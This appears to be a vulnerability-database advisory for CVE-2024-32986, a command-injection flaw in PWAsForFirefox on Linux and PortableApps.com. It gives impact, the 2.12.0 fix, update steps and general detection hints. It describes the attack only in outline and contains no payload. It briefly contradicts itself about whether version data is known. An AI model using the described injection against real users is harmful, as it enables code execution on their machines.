CVE-2024-32986
📋 TL;DR
This vulnerability allows malicious Progressive Web Apps (PWAs) to inject arbitrary code execution commands into desktop configuration files on Linux and PortableApps.com platforms. When a user launches a compromised web app, it can execute arbitrary system commands with the user's privileges. This affects all Linux and PortableApps.com users of PWAsForFirefox versions before 2.12.0.
💻 Affected Systems
- PWAsForFirefox
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Full system compromise via arbitrary code execution with user privileges, potentially leading to privilege escalation, data theft, or ransomware deployment.
Likely Case
Malicious web app executes arbitrary commands to steal user data, install malware, or establish persistence on the system.
If Mitigated
No impact if patched to version 2.12.0 or if using Windows/macOS platforms.
🎯 Exploit Status
Exploitation requires user interaction to install the malicious PWA, but once installed, code executes automatically on launch.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2.12.0
Vendor Advisory: https://github.com/filips123/PWAsForFirefox/security/advisories/GHSA-jmhv-m7v5-g5jq
Restart Required: Yes
Instructions:
1. Open Firefox. 2. Go to Add-ons Manager (Ctrl+Shift+A). 3. Find PWAsForFirefox. 4. Click 'Check for updates'. 5. Update to version 2.12.0. 6. Restart Firefox.
🔧 Temporary Workarounds
No known workarounds
allThe advisory states there are no known workarounds for this vulnerability.
🧯 If You Can't Patch
- Temporarily disable or uninstall PWAsForFirefox extension until patching is possible.
- Avoid installing new PWAs and be cautious with existing PWAs from untrusted sources.
🔍 How to Verify
Check if Vulnerable:
Check PWAsForFirefox version in Firefox Add-ons Manager. If version is below 2.12.0, you are vulnerable if using Linux or PortableApps.com.Check Version:
Not applicable - check via Firefox Add-ons Manager interface.Verify Fix Applied:
Confirm version is 2.12.0 or higher in Firefox Add-ons Manager.📡 Detection & Monitoring
Log Indicators:
- Unexpected Exec commands in XDG Desktop Entries or AppInfo.ini files
- Suspicious process execution from PWA launchers
Network Indicators:
- Unusual outbound connections from Firefox/PWA processes
SIEM Query:
Process creation where parent process is Firefox and command line contains suspicious patterns from PWA directories.🔗 References
- https://github.com/filips123/PWAsForFirefox/commit/9932d4b289631d447f88ace09a2fabafe4cd5bd5
- https://github.com/filips123/PWAsForFirefox/releases/tag/v2.12.0
- https://github.com/filips123/PWAsForFirefox/security/advisories/GHSA-jmhv-m7v5-g5jq
- https://github.com/filips123/PWAsForFirefox/commit/9932d4b289631d447f88ace09a2fabafe4cd5bd5
- https://github.com/filips123/PWAsForFirefox/releases/tag/v2.12.0
- https://github.com/filips123/PWAsForFirefox/security/advisories/GHSA-jmhv-m7v5-g5jq
